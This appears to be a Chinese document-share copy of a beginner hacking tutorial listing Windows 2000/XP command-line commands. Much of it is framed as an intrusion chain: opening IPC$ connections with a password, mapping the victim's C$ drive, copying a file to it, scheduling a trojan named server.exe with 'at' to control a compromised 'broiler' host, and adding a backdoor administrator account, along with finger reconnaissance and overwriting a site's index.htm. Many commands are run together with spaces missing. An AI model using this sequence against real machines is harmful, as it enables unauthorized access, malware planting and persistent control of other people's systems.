黑客必学之网络命令.docx

黑客必学之网络命令.docx

《黑客必学之网络命令.docx》由会员分享，可在线阅读，更多相关《黑客必学之网络命令.docx（14页珍藏版）》请在冰豆网上搜索。

黑客必学之网络命令

要学习网络攻击，首先我们必须学习一些基础的网络命令，我们所谓的基础命令其实也就是WIN2K，WINXP系统下的一些DOS命令，这个命令都又CMD.exe来完成

概念部分：

（1）2000、XP下的CMD与98的MS-DOS的不同之处：

cmd.exe叫命令提示符他与98下的MS-DOS是不一样的，所以我们不能将他混为一谈，但是我们却可以用CMD.exe来执行很多DOS命令，例如：

dir、cd、del等等！

（2）CMD下的内部命令与外部命令的不同：

CMD下的内部命令就是指：

我们可以直接在CMD下就可以执行的命令，例如：

telnet、ftp、dir、cd、等等，你可以在CMD下输入help进行查看,外部命令呢，就是cmd下不能直接运行的命令，（例如大家常用的nc）他需要在CMD下切换到他（NC）做在的目录你才能运行NC及NC的命令

实操部分：

（一）：

常用**防护命令：

Net、telnet、at、copy、ftp、finger、del~~~~~~

一些常用的Net命令与例子：

（1）建立IPC连接的命令

Netuse//IP/ipc$“”/user:

username

例如：

Netuse//127.0.0.1/ipc$123456/user:

administrator

这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接

（2）删除IPC$空连接

Netuse//ip/del

例如：

Netuse//127.0.0.1/del

删除与主机127.0.0.1已经建立的Ipc$连接

（3）启动关闭服务：

Netstart//查看已经开启的服务

Netstartservername

Netstopservername

例如：

Netstarttelnet//开启telnet服务

Netstoptelnet//关闭telnet服务

（4）启动关闭共享

Netshateipc$Content$nbsp;//开启ipc$默认共享

Netshareipc$/del//关闭ipc$默认共享

Netsharec=c:

///完全共享c盘

Netshared=d:

///删除完全共享的d盘

（4）映射硬盘

Netusez:

//ip/c$

例如：

Netusez:

//127.0.0.1/c$Content$nbsp;//把127.0.0.1的C盘映射成本机的z盘

说明：

映射成功后，你在我的电脑里面里面就会多出一个硬盘Z，其实Z就是127.0.0.1的C盘！

Netusez:

/del//断开映射

**中的作用：

把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了

成功实现的条件：

必须与对方建立ipc$连接

（5）远程复制文件_Copy

Copye:

/3389.exe//127.0.0.1/c$Content$nbsp;//将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下

Copy在**中的作用：

把本地文件复制到对方硬盘

Copy复制成功所需的条件：

必须与主机建立ipc$连接

（6）查看远程系统的时间

Nettime//IP

Nettime//127.0.0.1//查看远程主机127.0.0.1的本地时间

作用：

得到对方时间好为自己计划任务种下木马做准备

（7）远程运行程序

At//iptimeserver.exe

At//127.0.0.112:

30c:

/server.exe//让主机在中午12:

30分运行我们已经复制到他C

盘根目录下的木马server.exe

在**中作用：

这样我们就可以用我们的木马服务端来连接我们木马，，更好的使用图形方式来控制肉鸡

（8）添加管理员帐号：

Netuserusername1234/add//添加一个密码为1234名字为username的用户

Netlocalgroupadministratorsjuntuan/add//把username这个用户添加到管理员组

注意：

有些系统的管理员组不是administrators你要根据实际情况来改，不过99.9%的系统的管理员组还是administrators的。

修改用户密码：

Netuserusername1234//把用户username的密码修改成1233。

（9）远程登陆主机_telnet

telnetIPport

例如：

telnet127.0.0.11234//连接登陆127.0.0.1的1234端口

（当目标主机的端口是默认的23的时候我们不需要+端口即：

telnetIP就好）

（10）传输文件命令_ftp

其实这个我个人觉得用途不大，毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢？

首先在CMD里面输入ftp

然后输入：

openIPport

例如：

open127.0.0.11234//连接登陆127.0.0.1的1234端口

如何开启windows系统自带的ftp服务：

Netstartmsftppsvc

（11）查看文件夹的属性_cacls

Caclsxiaod//查看xiaod这个文件夹的属性

参数说明：

F：

（完全控制）R：

（只读）C：

（允许更改）W：

（允许写入）N：

（没有任何权限）

（12）删除文件_del

Del是用来删除文件命令

首先进入你想删除的文件的目录

Delxiaod.txt//删除xiaod.txt这个个文件

Delxiaod.txt/f//强制删除xiaod.txt这个个文件（当该文件无法正常删除的时候使用该命令）

（13）finger命令

Finger是一个信息刺探命令一般在对方开启了79端口时命令使用

Finger–luser@computer

参数详解：

-l用长列表格式显示消息

User:

指定用户的信息

成功实现的条件：

对方必须安装tcp/ip协议

（14）：

文件写入命令_echo:

Echo你好>index.htm//用你好来覆盖index.htm的内容

Echo你好>>index.htm//将“你好”添加到index.htm

（15）：

写入注册表文件_regedit

Regedit/sfilename.reg//s是写入参数

（16）：

端口映射_chgport

Chgport3=5//将端口3映射到5

Chgport/d*//删除所有端口映射

（17）：

文件映射_subst

Substb:

/c:

/winnt//这个时候当你访问硬盘B的时候你就是访问了c:

/winnt目录

（18）：

查看当前正在使用的帐号：

Querysession//查看帐号

（19）：

踢掉指定用：

Logoffid//注意ID，是在用querysession查看到的用户的id而不是用户名。

（20）：

发送消息给某用户或者内网主机

Netsendhostnameor/IPmessage

例如：

netsendxiaodor/127.0.0.1hello